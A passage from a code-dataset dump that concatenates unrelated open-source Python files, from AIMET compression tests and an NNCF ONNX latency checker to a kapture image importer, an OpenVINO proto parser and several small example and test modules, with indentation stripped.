# Instantiate child
greedy_algo = comp_ratio_select.GreedyCompRatioSelectAlgo(layer_db, pruner, SpatialSvdCostCalculator(),
eval_func, 20, CostMetric.mac, 0.5, 10, True, None,
None, False, bokeh_session=None)
progress_bar = ProgressBar(1, "eval scores", "green", bokeh_session=bokeh_session)
data_table = DataTable(num_columns=3, num_rows=1,
column_names=['0.1', '0.2', '0.3', '0.4', '0.5', '0.6', '0.7', '0.8', '0.9'],
row_index_names= [layer1.name], bokeh_session=bokeh_session)
pruner.prune_model.return_value = layer_db
eval_dict = greedy_algo._compute_layerwise_eval_score_per_comp_ratio_candidate(data_table, progress_bar, layer1)
self.assertEqual(90, eval_dict[Decimal('0.1')])
bokeh_session.server_session.close("test complete")
os.killpg(os.getpgid(process.pid), signal.SIGTERM)
def test_eval_scores(self):
pruner = unittest.mock.MagicMock()
eval_func = unittest.mock.MagicMock()
eval_func.side_effect = [90, 80, 70, 60, 50, 40, 30, 20, 10,
91, 81, 71, 61, 51, 41, 31, 21, 11]
model = mnist_torch_model.Net().to('cpu')
input_shape = (1, 1, 28, 28)
dummy_input = create_rand_tensors_given_shapes(input_shape)
layer_db = LayerDatabase(model, dummy_input)
layer1 = layer_db.find_layer_by_name('conv1')
layer2 = layer_db.find_layer_by_name('conv2')
layer_db.mark_picked_layers([layer1, layer2])
# Instantiate child
greedy_algo = comp_ratio_select.GreedyCompRatioSelectAlgo(layer_db, pruner, SpatialSvdCostCalculator(),
eval_func, 20, CostMetric.mac, 0.5, 10, True, None,
None, False, bokeh_session=None)
eval_dict = greedy_algo._compute_eval_scores_for_all_comp_ratio_candidates()
self.assertEqual(50, eval_dict['conv1'][Decimal('0.5')])
self.assertEqual(60, eval_dict['conv1'][Decimal('0.4')])
self.assertEqual(11, eval_dict['conv2'][Decimal('0.9')])
def test_eval_scores_with_spatial_svd_pruner(self):
pruner = SpatialSvdPruner()
eval_func = unittest.mock.MagicMock()
eval_func.side_effect = [90, 80, 70, 60, 50, 40, 30, 20, 10,
91, 81, 71, 61, 51, 41, 31, 21, 11]
model = mnist_torch_model.Net()
# Create a layer database
input_shape = (1, 1, 28, 28)
dummy_input = create_rand_tensors_given_shapes(input_shape)
layer_db = LayerDatabase(model, dummy_input)
layer1 = layer_db.find_layer_by_name('conv1')
layer2 = layer_db.find_layer_by_name('conv2')
layer_db.mark_picked_layers([layer1, layer2])
# Instantiate child
greedy_algo = comp_ratio_select.GreedyCompRatioSelectAlgo(layer_db, pruner, SpatialSvdCostCalculator(),
eval_func, 20, CostMetric.mac, 0.5, 10, True, None,
None, True, bokeh_session=None)
eval_dict = greedy_algo._compute_eval_scores_for_all_comp_ratio_candidates()
print()
print(eval_dict)
self.assertEqual(90, eval_dict['conv1'][Decimal('0.1')])
self.assertEqual(51, eval_dict['conv2'][Decimal('0.5')])
self.assertEqual(21, eval_dict['conv2'][Decimal('0.8')])
def test_find_min_max_eval_scores(self):
eval_scores_dict = {'layer1': {Decimal('0.1'): 90, Decimal('0.5'): 50, Decimal('0.7'): 30, Decimal('0.8'): 20},
'layer2': {Decimal('0.2'): 91, Decimal('0.3'): 45, Decimal('0.7'): 30, Decimal('0.9'): 11}}
min_score, max_score = comp_ratio_select.GreedyCompRatioSelectAlgo._find_min_max_eval_scores(eval_scores_dict)
self.assertEqual(11, min_score)
self.assertEqual(91, max_score)
eval_scores_dict = {'layer1': {Decimal('0.1'): 10, Decimal('0.5'): 92, Decimal('0.7'): 30, Decimal('0.8'): 20},
'layer2': {Decimal('0.2'): 91, Decimal('0.3'): 45, Decimal('0.7'): 30, Decimal('0.9'): 11}}
min_score, max_score = comp_ratio_select.GreedyCompRatioSelectAlgo._find_min_max_eval_scores(eval_scores_dict)
self.assertEqual(10, min_score)
self.assertEqual(92, max_score)
def test_find_layer_comp_ratio_given_eval_score(self):
eval_scores_dict = {'layer1': {Decimal('0.1'): 90, Decimal('0.5'): 50, Decimal('0.7'): 30, Decimal('0.8'): 20},
'layer2': {Decimal('0.1'): 11,
Decimal('0.3'): 23,
Decimal('0.5'): 47,
Decimal('0.7'): 85,
Decimal('0.9'): 89}
}
layer2 = Layer(nn.Conv2d(32, 64, 3), "layer2", None)
greedy_algo = comp_ratio_select.GreedyCompRatioSelectAlgo
comp_ratio = greedy_algo._find_layer_comp_ratio_given_eval_score(eval_scores_dict,
45,
layer2)
self.assertEqual(Decimal('0.5'), comp_ratio)
comp_ratio = greedy_algo._find_layer_comp_ratio_given_eval_score(eval_scores_dict,
48,
layer2)
self.assertEqual(Decimal('0.7'), comp_ratio)
comp_ratio = greedy_algo._find_layer_comp_ratio_given_eval_score(eval_scores_dict,
90,
layer2)
self.assertEqual(None, comp_ratio)
def test_select_per_layer_comp_ratios(self):
pruner = unittest.mock.MagicMock()
eval_func = unittest.mock.MagicMock()
rounding_algo = unittest.mock.MagicMock()
rounding_algo.round.side_effect = [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9,
0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9]
eval_func.side_effect = [10, 20, 30, 40, 50, 60, 70, 80, 90,
11, 21, 31, 35, 40, 45, 50, 55, 60]
model = mnist_torch_model.Net()
input_shape = (1, 1, 28, 28)
dummy_input = create_rand_tensors_given_shapes(input_shape)
layer_db = LayerDatabase(model, dummy_input)
layer1 = layer_db.find_layer_by_name('conv1')
layer2 = layer_db.find_layer_by_name('conv2')
selected_layers = [layer1, layer2]
layer_db.mark_picked_layers([layer1, layer2])
try:
os.remove('./data/greedy_selection_eval_scores_dict.pkl')
except OSError:
pass
# Instantiate child
greedy_algo = comp_ratio_select.GreedyCompRatioSelectAlgo(layer_db, pruner, SpatialSvdCostCalculator(),
eval_func, 20, CostMetric.mac, Decimal(0.6), 10, True,
None, rounding_algo, False, bokeh_session=None)
layer_comp_ratio_list, stats = greedy_algo.select_per_layer_comp_ratios()
original_cost = SpatialSvdCostCalculator.compute_model_cost(layer_db)
for layer in layer_db:
if layer not in selected_layers:
layer_comp_ratio_list.append(LayerCompRatioPair(layer, None))
compressed_cost = SpatialSvdCostCalculator.calculate_compressed_cost(layer_db, layer_comp_ratio_list,
CostMetric.mac)
rounding_algo.round.side_effect = [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9,
0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9]
actual_compression_ratio = compressed_cost.mac / original_cost.mac
self.assertTrue(math.isclose(Decimal(0.6), actual_compression_ratio, abs_tol=0.05))
self.assertTrue(os.path.isfile('./data/greedy_selection_eval_scores_dict.pkl'))
print('\n')
for pair in layer_comp_ratio_list:
print(pair)
# lets repeat with a saved eval_dict
greedy_algo = comp_ratio_select.GreedyCompRatioSelectAlgo(layer_db, pruner, SpatialSvdCostCalculator(),
eval_func, 20, CostMetric.mac, Decimal(0.6), 10, True,
'./data/greedy_selection_eval_scores_dict.pkl',
rounding_algo, False, bokeh_session=None)
layer_comp_ratio_list, stats = greedy_algo.select_per_layer_comp_ratios()
original_cost = SpatialSvdCostCalculator.compute_model_cost(layer_db)
for layer in layer_db:
if layer not in selected_layers:
layer_comp_ratio_list.append(LayerCompRatioPair(layer, None))
compressed_cost = SpatialSvdCostCalculator.calculate_compressed_cost(layer_db, layer_comp_ratio_list,
CostMetric.mac)
actual_compression_ratio = compressed_cost.mac / original_cost.mac
self.assertTrue(math.isclose(Decimal(0.6), actual_compression_ratio, abs_tol=0.05))
print('\n')
for pair in layer_comp_ratio_list:
print(pair)
def test_select_per_layer_comp_ratios_with_spatial_svd_pruner(self):
pruner = SpatialSvdPruner()
eval_func = unittest.mock.MagicMock()
rounding_algo = unittest.mock.MagicMock()
eval_func.side_effect = [10, 20, 30, 40, 50, 60, 70, 80, 90,
11, 21, 31, 35, 40, 45, 50, 55, 60]
rounding_algo.round.side_effect = [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9,
0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9]
model = mnist_torch_model.Net()
input_shape = (1, 1, 28, 28)
dummy_input = create_rand_tensors_given_shapes(input_shape)
layer_db = LayerDatabase(model, dummy_input)
selected_layers = [layer for layer in layer_db if isinstance(layer.module, nn.Conv2d)]
layer_db.mark_picked_layers(selected_layers)
# Instantiate child
greedy_algo = comp_ratio_select.GreedyCompRatioSelectAlgo(layer_db, pruner, SpatialSvdCostCalculator(),
eval_func, 20, CostMetric.mac, Decimal(0.4), 10, True,
None, rounding_algo, False, bokeh_session=None)
layer_comp_ratio_list, stats = greedy_algo.select_per_layer_comp_ratios()
original_cost = SpatialSvdCostCalculator.compute_model_cost(layer_db)
for layer in layer_db:
if layer not in selected_layers:
layer_comp_ratio_list.append(LayerCompRatioPair(layer, None))
compressed_cost = SpatialSvdCostCalculator.calculate_compressed_cost(layer_db, layer_comp_ratio_list,
CostMetric.mac)
actual_compression_ratio = compressed_cost.mac / original_cost.mac
self.assertTrue(math.isclose(Decimal(0.3), actual_compression_ratio, abs_tol=0.8))
print('\n')
for pair in layer_comp_ratio_list:
print(pair)
def test_comp_ratio_select_tar(self):
compute_model_cost = unittest.mock.MagicMock()
pruner = unittest.mock.MagicMock()
eval_func = unittest.mock.MagicMock()
eval_func.side_effect = [0.1,0.15,0.2,0.25,0.3,0.35,0.4,0.45,0.5,0.55,0.6,0.65,0.7,0.75,0.8,0.85,0.9,0.95,0.97,1.0,
0.1,0.15,0.2,0.25,0.3,0.35,0.4,0.45,0.5,0.55,0.6,0.65,0.7,0.75,0.8,0.85,0.9,0.95,0.97,1.0,
0.1,0.15,0.2,0.25,0.3,0.35,0.4,0.45,0.5,0.55,0.6,0.65,0.7,0.75,0.8,0.85,0.9,0.95,0.97,1.0,
0.1,0.15,0.2,0.25,0.3,0.35,0.4,0.45,0.5,0.55,0.6,0.65,0.7,0.75,0.8,0.85,0.9,0.95,0.97,1.0]
compute_model_cost.return_value = (500,500)
compute_network_cost = unittest.mock.MagicMock()
compute_network_cost.return_value = (500,500)
model = mnist_torch_model.Net().to('cpu')
input_shape = (1, 1, 28, 28)
dummy_input = create_rand_tensors_given_shapes(input_shape)
layer_db = LayerDatabase(model, dummy_input)
layer1 = layer_db.find_layer_by_name('conv2')
layer_db.mark_picked_layers([layer1])
layer2 = layer_db.find_layer_by_name('fc2')
layer_db.mark_picked_layers([layer2])
layer3 = layer_db.find_layer_by_name('fc1')
layer_db.mark_picked_layers([layer3])
# Instantiate child
tar_algo = comp_ratio_select.TarRankSelectAlgo(layer_db=layer_db, pruner=pruner,
cost_calculator=WeightSvdCostCalculator(),
eval_func=eval_func, eval_iterations=20,
cost_metric=CostMetric.mac, num_rank_indices=20,
use_cuda=False, pymo_utils_lib=pymo_utils)
tar_algo._svd_lib_ref = create_autospec(pymo.Svd, instance=True)
tar_algo._svd_lib_ref.SetCandidateRanks = unittest.mock.MagicMock()
tar_algo._svd_lib_ref.SetCandidateRanks.return_value = 20
tar_algo._num_rank_indices = 20
with unittest.mock.patch('aimet_common.cost_calculator.CostCalculator.calculate_comp_ratio_given_rank') as calculate_comp_ratio_given_rank:
calculate_comp_ratio_given_rank.side_effect = [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0,
0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0,
0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0]
layer_comp_ratio_list, stats = tar_algo.select_per_layer_comp_ratios()
self.assertEqual(layer_comp_ratio_list[2].eval_score, 0.97)
self.assertEqual(layer_comp_ratio_list[2].comp_ratio, 1.0)
|
examples/experimental/onnx/performance_checker.py | openvinotoolkit/nncf_pytorch | 136 | 12685547 | """
Copyright (c) 2022 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
from typing import List
from typing import Optional
import numpy as np
import onnx
from tqdm import tqdm
from nncf.common.utils.logger import logger as nncf_logger
from openvino.tools.accuracy_checker.config import ConfigReader
from openvino.tools.accuracy_checker.argparser import build_arguments_parser
from openvino.tools.accuracy_checker.dataset import Dataset
from openvino.tools.accuracy_checker.evaluators import ModelEvaluator
import nncf.experimental.post_training.api.dataset as ptq_api_dataset
from nncf.experimental.onnx.engine import ONNXEngine
from nncf.experimental.onnx.samplers import create_onnx_sampler
from time import time
import pandas as pd
class OpenVINOAccuracyCheckerDataset(ptq_api_dataset.Dataset):
def __init__(self, evaluator: ModelEvaluator, batch_size, shuffle):
super().__init__(batch_size, shuffle)
self.model_evaluator = evaluator
def __getitem__(self, item):
_, batch_annotation, batch_input, _ = self.model_evaluator.dataset[item]
filled_inputs, _, _ = self.model_evaluator._get_batch_input(
batch_annotation, batch_input)
assert len(filled_inputs) == 1
dummy_target = 0
for _, v in filled_inputs[0].items():
return np.squeeze(v, axis=0), dummy_target
raise RuntimeError("filled_inputs has no value.")
def __len__(self):
return len(self.model_evaluator.dataset)
def run(onnx_model_path: str, output_file_path: str, dataset: Dataset,
ignored_scopes: Optional[List[str]] = None, evaluate: Optional[bool] = False):
num_init_samples = len(dataset)
nncf_logger.info("Post-Training Quantization Parameters:")
nncf_logger.info(f" number of samples: {num_init_samples}")
nncf_logger.info(f" ignored_scopes: {ignored_scopes}")
onnx.checker.check_model(onnx_model_path)
original_model = onnx.load(onnx_model_path)
nncf_logger.info(f"The model is loaded from {onnx_model_path}")
onnx.checker.check_model(original_model)
engine = ONNXEngine()
sampler = create_onnx_sampler(dataset, range(len(dataset)))
engine.rt_session_options['providers'] = ["OpenVINOExecutionProvider"]
engine.set_model(original_model)
engine.set_sampler(sampler)
elapsed_times = []
for input_data, _ in tqdm(sampler):
start_time = time()
engine.infer(input_data)
elapsed_times += [1000.0 * (time() - start_time)]
elapsed_times = np.array(elapsed_times)
model_name, _ = os.path.splitext(os.path.basename(onnx_model_path))
df = pd.DataFrame({
"model_name": [model_name],
"latency_mean": [np.mean(elapsed_times)],
"latency_std": [np.std(elapsed_times)]
})
if os.path.exists(output_file_path):
df.to_csv(output_file_path, header=False, mode="a", index=False)
else:
df.to_csv(output_file_path, header=True, mode="w", index=False)
if __name__ == '__main__':
parser = build_arguments_parser()
parser.add_argument("--output-file-path", "-o",
help="Directory path to save output quantized ONNX model", type=str)
args = parser.parse_args()
config, mode = ConfigReader.merge(args)
assert mode == "models"
for config_entry in config[mode]:
model_evaluator = ModelEvaluator.from_configs(config_entry)
assert "datasets" in config_entry
assert len(config_entry["datasets"]
) == 1, "Config should have one dataset."
dataset_config = config_entry["datasets"][0]
assert "launchers" in config_entry
assert len(config_entry["launchers"]) == 1
run(onnx_model_path=str(config_entry["launchers"][0]["model"]),
output_file_path=args.output_file_path,
dataset=OpenVINOAccuracyCheckerDataset(model_evaluator, batch_size=1, shuffle=True))
|
src/python/pants/backend/go/util_rules/link.py | yoav-orca/pants | 1,806 | 12685549 | <gh_stars>1000+
# Copyright 2021 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
from dataclasses import dataclass
from pants.backend.go.util_rules.sdk import GoSdkProcess
from pants.engine.fs import Digest
from pants.engine.process import ProcessResult
from pants.engine.rules import Get, collect_rules, rule
@dataclass(frozen=True)
class LinkGoBinaryRequest:
"""Link a Go binary from package archives and an import configuration."""
input_digest: Digest
archives: tuple[str, ...]
import_config_path: str
output_filename: str
description: str
@dataclass(frozen=True)
class LinkedGoBinary:
"""A linked Go binary stored in a `Digest`."""
digest: Digest
@rule
async def link_go_binary(request: LinkGoBinaryRequest) -> LinkedGoBinary:
result = await Get(
ProcessResult,
GoSdkProcess(
input_digest=request.input_digest,
command=(
"tool",
"link",
"-importcfg",
request.import_config_path,
"-o",
request.output_filename,
"-buildmode=exe", # seen in `go build -x` output
*request.archives,
),
description=f"Link Go binary: {request.output_filename}",
output_files=(request.output_filename,),
),
)
return LinkedGoBinary(result.output_digest)
def rules():
return collect_rules()
|
pclib/test/TestSimpleSink_test.py | belang/pymtl | 206 | 12685561 | <filename>pclib/test/TestSimpleSink_test.py
#=========================================================================
# TestSimpleSink_test.py
#=========================================================================
from __future__ import print_function
from pymtl import *
from TestSimpleSource import TestSimpleSource
from TestSimpleSink import TestSimpleSink
#-------------------------------------------------------------------------
# TestHarness
#-------------------------------------------------------------------------
class TestHarness( Model ):
def __init__( s, dtype, msgs ):
# Instantiate models
s.src = TestSimpleSource ( dtype, msgs )
s.sink = TestSimpleSink ( dtype, msgs )
# Connect chain
s.connect( s.src.out.msg, s.sink.in_.msg )
s.connect( s.src.out.val, s.sink.in_.val )
s.connect( s.src.out.rdy, s.sink.in_.rdy )
def done( s ):
return s.src.done and s.sink.done
def line_trace( s ):
return s.src.line_trace() + " | " + s.sink.line_trace()
#-------------------------------------------------------------------------
# test_basics
#-------------------------------------------------------------------------
def test_basics( dump_vcd ):
# Test messages
test_msgs = [
0x0000,
0x0a0a,
0x0b0b,
0x0c0c,
0x0d0d,
0xf0f0,
0xe0e0,
0xd0d0,
]
# Instantiate and elaborate the model
model = TestHarness( 16, test_msgs )
model.vcd_file = dump_vcd
model.elaborate()
# Create a simulator using the simulation tool
sim = SimulationTool( model )
# Run the simulation
print()
sim.reset()
while not model.done():
sim.print_line_trace()
sim.cycle()
# Add a couple extra ticks so that the VCD dump is nicer
sim.cycle()
sim.cycle()
sim.cycle()
|
tools/kapture_import_image_folder.py | v-mehta/kapture | 264 | 12685592 | #!/usr/bin/env python3
# Copyright 2020-present NAVER Corp. Under BSD 3-clause license
"""
This script imports images from a folder in the kapture format
"""
import argparse
import logging
import os
import os.path as path
import PIL
from PIL import Image
# kapture
import path_to_kapture # noqa: F401
import kapture
import kapture.utils.logging
from kapture.io.structure import delete_existing_kapture_files
from kapture.io.csv import kapture_to_dir, sensors_from_file
from kapture.utils.paths import path_secure
from kapture.io.records import TransferAction, import_record_data_from_dir_auto
logger = logging.getLogger('image_folder')
def import_image_folder(
images_path: str,
kapture_path: str,
force_overwrite_existing: bool = False,
images_import_method: TransferAction = TransferAction.skip
) -> None:
"""
Imports the images of a folder to a kapture. This creates only images and cameras.
:param images_path: path to directory containing the images.
:param kapture_path: path to kapture root directory.
:param force_overwrite_existing: Silently overwrite kapture files if already exists.
:param images_import_method: choose how to import actual image files.
"""
os.makedirs(kapture_path, exist_ok=True)
delete_existing_kapture_files(kapture_path, force_erase=force_overwrite_existing)
images = kapture.RecordsCamera()
file_list = [path.relpath(path.join(dirpath, filename), images_path)
for dirpath, dirs, filenames in os.walk(images_path)
for filename in filenames]
file_list = sorted(file_list)
try:
sensors_filepath = path.join(images_path, 'sensors.txt')
sensors = sensors_from_file(sensors_filepath)
sensors_given = True
except OSError:
logger.info('image folder has no extra sensor info')
sensors = kapture.Sensors()
sensors_given = False
logger.info('starting conversion...')
for n, filename in enumerate(file_list):
# test if file is a valid image
try:
# lazy load
with Image.open(path.join(images_path, filename)) as im:
width, height = im.size
model_params = [width, height]
except (OSError, PIL.UnidentifiedImageError):
# It is not a valid image: skip it
logger.info(f'Skipping invalid image file {filename}')
continue
if sensors_given:
if len(sensors) == 1:
# in case of single camera, just take the name from sensors.txt
camera_id = list(sensors.keys())[0]
else:
# guess sensor_id from dirname
camera_id = path.dirname(path.join(images_path, filename)).split(os.sep)[-1]
if camera_id not in sensors:
logger.critical(f'camera {camera_id} is not found in sensors.txt')
raise KeyError(f'camera {camera_id} is not found in sensors.txt')
else:
camera_id = f'sensor{n}'
sensors[camera_id] = kapture.Camera(kapture.CameraType.UNKNOWN_CAMERA, model_params)
images[(n, camera_id)] = path_secure(filename) # don't forget windows
# import (copy) image files.
logger.info('import image files ...')
filename_list = [f for _, _, f in kapture.flatten(images)]
import_record_data_from_dir_auto(images_path, kapture_path, filename_list, images_import_method)
# pack into kapture format
imported_kapture = kapture.Kapture(sensors=sensors, records_camera=images)
logger.info('writing imported data...')
kapture_to_dir(kapture_path, imported_kapture)
def import_image_folder_command_line() -> None:
"""
Do the image list import to kapture using the parameters given on the command line.
"""
parser = argparse.ArgumentParser(description='imports images from a folder in the kapture format')
parser_verbosity = parser.add_mutually_exclusive_group()
parser_verbosity.add_argument(
'-v', '--verbose', nargs='?', default=logging.WARNING, const=logging.INFO,
action=kapture.utils.logging.VerbosityParser,
help='verbosity level (debug, info, warning, critical, ... or int value) [warning]')
parser_verbosity.add_argument(
'-q', '--silent', '--quiet', action='store_const', dest='verbose', const=logging.CRITICAL)
parser.add_argument('-f', '-y', '--force', action='store_true', default=False,
help='Force delete output if already exists.')
# import ###########################################################################################################
parser.add_argument('-i', '--input', required=True, help='input path to images root folder')
parser.add_argument('-o', '--output', required=True, help='output directory')
parser.add_argument('--image_transfer', type=TransferAction, default=TransferAction.link_absolute,
help=f'How to import images [link_absolute], '
f'choose among: {", ".join(a.name for a in TransferAction)}')
####################################################################################################################
args = parser.parse_args()
logger.setLevel(args.verbose)
if args.verbose <= logging.DEBUG:
# also let kapture express its logs
kapture.utils.logging.getLogger().setLevel(args.verbose)
import_image_folder(args.input, args.output, args.force, args.image_transfer)
if __name__ == '__main__':
import_image_folder_command_line()
|
PyPortal_NewNewNew/newnewnew.py | joewalk102/Adafruit_Learning_System_Guides | 665 | 12685598 | import time
import board
import adafruit_pyportal
# We can cycle through the latest featured products
#PRODUCTS_TYPE = "featured"
#or we can view the latest new products
PRODUCTS_TYPE = "new"
# Set up where we'll be fetching data from
DATA_SOURCE = "https://www.adafruit.com/api/products?format=micro&"+PRODUCTS_TYPE+"=1&random=1"
# What data we'll be viewing
IMAGE_LOCATION = [0, "image"]
NAME_LOCATION = [0, "name"]
URL_LOCATION = [0, "url"]
# determine the current working directory needed so we know where to find files
cwd = ("/"+__file__).rsplit('/', 1)[0]
pyportal = adafruit_pyportal.PyPortal(url=DATA_SOURCE,
json_path=(NAME_LOCATION, URL_LOCATION),
status_neopixel=board.NEOPIXEL,
default_bg=cwd+"/new_background.bmp",
text_font=cwd+"/fonts/Arial-Bold-12.bdf",
text_position=((5, 35), (5, 225)),
text_color=(0xFFFFFF, 0xFFFFFF),
text_wrap=(35, 35), # characters to wrap
image_json_path=IMAGE_LOCATION,
image_resize=(320, 240),
image_position=(0, 0))
pyportal.preload_font()
while True:
response = None
try:
response = pyportal.fetch()
print("Response is", response)
except (IndexError, RuntimeError, ValueError) as e:
print("Some error occured, retrying! -", e)
time.sleep(60)
|
packages/python/3.10.0-alpha.7/test.py | ShaneLee/piston | 1,320 | 12685602 | working = True
match working:
case True:
print("OK")
case False:
print() |
tools/mo/openvino/tools/mo/utils/simple_proto_parser.py | ryanloney/openvino-1 | 1,127 | 12685635 | # Copyright (C) 2018-2022 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import ast
import logging as log
import os
from openvino.tools.mo.utils.error import Error
class SimpleProtoParser(object):
"""
This is a simple Proto2 parser that has limited functionality and is intended to parse configuration files for the
models created with Object Detection API only. The result of the parser is the dictionary.
"""
_tokens = list()
_result = dict()
def __init__(self):
self._tokens = list()
self._result = dict()
@staticmethod
def _convert_value_to_correct_datatype(value: str):
"""
Converts string representation of the token to a value with proper data type.
:param value: string representation to be converted.
:return: converted to a correct data type value.
"""
if value == 'true':
return True
if value == 'false':
return False
try:
result = ast.literal_eval(value)
return result
except Exception: # if it is not possible to evaluate the value then consider it as a string
return value
@staticmethod
def _convert_values_to_correct_datatypes(d: dict):
"""
Convert dictionary with values to correct data types.
:param d: dictionary with values.
:return: None
"""
for key, value in d.items():
if isinstance(value, dict):
__class__._convert_values_to_correct_datatypes(value)
elif isinstance(value, list):
d[key] = [__class__._convert_value_to_correct_datatype(item) for item in value]
else:
d[key] = __class__._convert_value_to_correct_datatype(value)
def _add_non_empty_token(self, token: str):
"""
Add token to the list of tokens if it is non-empty.
:param token: token to add
:return: None
"""
if token != "":
self._tokens.append(token)
def _parse_list(self, result: list, token_ind: int):
prev_token = '['
while token_ind < len(self._tokens):
cur_token = self._tokens[token_ind]
if cur_token == ']':
return token_ind + 1
if cur_token == ',':
if prev_token == ',' or prev_token == '[':
raise Error('Missing value in the list at position {}'.format(token_ind))
else:
result.append(cur_token)
token_ind += 1
prev_token = cur_token
return token_ind
def _parse_tokens(self, result: dict, token_ind: int, depth: int=0):
"""
Internal function that parses tokens.
:param result: current dictionary where to store parse result.
:param token_ind: index of the token from the tokens list to start parsing from.
:return: token index to continue parsing from.
"""
while token_ind < len(self._tokens):
cur_token = self._tokens[token_ind]
if cur_token == ',': # redundant commas that we simply ignore everywhere except list "[x, y, z...]"
token_ind += 1
continue
if cur_token == '}':
return token_ind + 1
next_token = self._tokens[token_ind + 1]
if next_token == '{':
result[cur_token] = dict()
token_ind = self._parse_tokens(result[cur_token], token_ind + 2, depth + 1)
elif next_token == ':':
next_next_token = self._tokens[token_ind + 2]
if next_next_token == '[':
result[cur_token] = list()
token_ind = self._parse_list(result[cur_token], token_ind + 3)
else:
if cur_token not in result:
result[cur_token] = self._tokens[token_ind + 2]
else:
if not isinstance(result[cur_token], list):
old_val = result[cur_token]
result[cur_token] = [old_val]
result[cur_token].append(self._tokens[token_ind + 2])
token_ind += 3
else:
raise Error('Wrong character "{}" in position {}'.format(next_token, token_ind))
if depth != 0:
raise Error('Input/output braces mismatch.')
return token_ind
def _convert_tokens_to_dict(self):
"""
Convert list of tokens into a dictionary with proper structure.
Then converts values in the dictionary to values of correct data types. For example, 'false' -> False,
'true' -> true, '0.004' -> 0.004, etc.
:return: True if conversion is successful.
"""
try:
self._parse_tokens(self._result, 0)
except Exception as ex:
log.error('Failed to convert tokens to dictionary: {}'.format(str(ex)))
return False
self._convert_values_to_correct_datatypes(self._result)
return True
def _split_to_tokens(self, file_content: str):
"""
The function gets file content as string and converts it to the list of tokens (all tokens are still strings).
:param file_content: file content as a string
"""
cur_token = ''
string_started = False
for line in file_content.split('\n'):
cur_token = ''
line = line.strip()
if line.startswith('#'): # skip comments
continue
for char in line:
if string_started:
if char == '"': # string ended
self._add_non_empty_token(cur_token)
cur_token = '' # start of a new string
string_started = False
else:
cur_token += char
elif char == '"':
self._add_non_empty_token(cur_token)
cur_token = '' # start of a new string
string_started = True
elif (char == " " and not string_started) or char == '\n':
self._add_non_empty_token(cur_token)
cur_token = ''
elif char in [':', '{', '}', '[', ']', ',']:
self._add_non_empty_token(cur_token)
self._tokens.append(char)
cur_token = ''
else:
cur_token += char
self._add_non_empty_token(cur_token)
self._add_non_empty_token(cur_token)
def parse_from_string(self, file_content: str):
"""
Parses the proto text file passed as a string.
:param file_content: content of the file.
:return: dictionary with file content or None if the file cannot be parsed.
"""
self._split_to_tokens(file_content)
if not self._convert_tokens_to_dict():
log.error('Failed to generate dictionary representation of file.')
return None
return self._result
def parse_file(self, file_name: str):
"""
Parses the specified file and returns its representation as dictionary.
:param file_name: file name to parse.
:return: dictionary with file content or None if the file cannot be parsed.
"""
if not os.path.exists(file_name):
log.error('File {} does not exist'.format(file_name))
return None
try:
with open(file_name) as file:
file_content = file.readlines()
except Exception as ex:
log.error('Failed to read file {}: {}'.format(file_name, str(ex)))
return None
return self.parse_from_string(''.join(file_content))
|
python_modules/dagster/dagster_tests/core_tests/definitions_tests/foo/bar.py | dbatten5/dagster | 4,606 | 12685636 | <filename>python_modules/dagster/dagster_tests/core_tests/definitions_tests/foo/bar.py
from dagster import pipeline
from .baz import baz_solid # pylint: disable=import-error
@pipeline
def bar_pipeline():
baz_solid()
|
release/scripts/presets/fluid/oil.py | rbabari/blender | 365 | 12685652 | import bpy
bpy.context.fluid.domain_settings.viscosity_base = 5.0
bpy.context.fluid.domain_settings.viscosity_exponent = 5
|
tests/ext/test_sentry.py | hartungstenio/loafer | 111 | 12685676 | from unittest import mock
from loafer.ext.sentry import sentry_handler
def test_sentry_handler():
mock_scope = mock.MagicMock()
sdk_mocked = mock.Mock()
sdk_mocked.push_scope.return_value = mock_scope
handler = sentry_handler(sdk_mocked)
exc = ValueError("test")
exc_info = (type(exc), exc, None)
delete_message = handler(exc_info, "test")
assert delete_message is False
assert sdk_mocked.push_scope.called
mock_scope.__enter__.return_value.set_extra.assert_called_once_with(
"message", "test"
)
sdk_mocked.capture_exception.assert_called_once_with(exc_info)
def test_sentry_handler_delete_message():
mock_scope = mock.MagicMock()
sdk_mocked = mock.Mock()
sdk_mocked.push_scope.return_value = mock_scope
handler = sentry_handler(sdk_mocked, delete_message=True)
exc = ValueError("test")
exc_info = (type(exc), exc, None)
delete_message = handler(exc_info, "test")
assert delete_message is True
assert sdk_mocked.push_scope.called
mock_scope.__enter__.return_value.set_extra.assert_called_once_with(
"message", "test"
)
sdk_mocked.capture_exception.assert_called_once_with(exc_info)
|
rentomatic/use_cases/storageroom_use_cases.py | keobox/rentomatic | 410 | 12685678 | from rentomatic.shared import use_case as uc
from rentomatic.shared import response_object as res
class StorageRoomListUseCase(uc.UseCase):
def __init__(self, repo):
self.repo = repo
def process_request(self, request_object):
domain_storageroom = self.repo.list(filters=request_object.filters)
return res.ResponseSuccess(domain_storageroom)
|
